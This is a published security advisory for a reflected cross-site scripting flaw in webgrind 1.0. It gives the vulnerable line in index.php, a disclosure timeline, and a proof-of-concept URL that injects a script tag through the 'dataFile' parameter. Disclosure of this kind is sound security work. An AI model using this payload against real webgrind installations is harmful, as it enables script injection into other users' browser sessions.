webgrind 1.0 (dataFile) Remote Reflected XSS Vulnerability

webgrind 1.0 (dataFile) Remote Reflected XSS Vulnerability


Vendor: Joakim Nygard and Jacob Oettinger
Product web page: http://code.google.com/p/webgrind
Affected version: 1.0

Summary: Webgrind is an Xdebug profiling web frontend in PHP5.

Desc: webgrind suffers from a XSS vulnerability when parsing
user input to the 'dataFile' parameter via GET method in the
index.php script. Attackers can exploit this weakness to execute
arbitrary HTML and script code in a user's browser session.

----------------------------------------
/index.php:
-----------

24:    case 'function_list':
25:        $dataFile = get('dataFile');

----------------------------------------

Tested on: Microsoft Windows XP Professional SP3 (EN)
           Apache 2.2.21
           PHP 5.3.9
           MySQL 5.5.20


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Vendor status:

[13.02.2012] Vulnerability discovered.
[16.02.2012] Vendor notified.
[17.02.2012] Public security advisory released.


Advisory ID: ZSL-2012-5073
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5073.php

Vendor: http://code.google.com/p/webgrind/issues/detail?id=65


13.02.2012

---

 http://localhost/webgrind/index.php?dataFile=<script>alert("ZSL");</script>&costFormat=msec&showFraction=1&hideInternals=0&op=function_list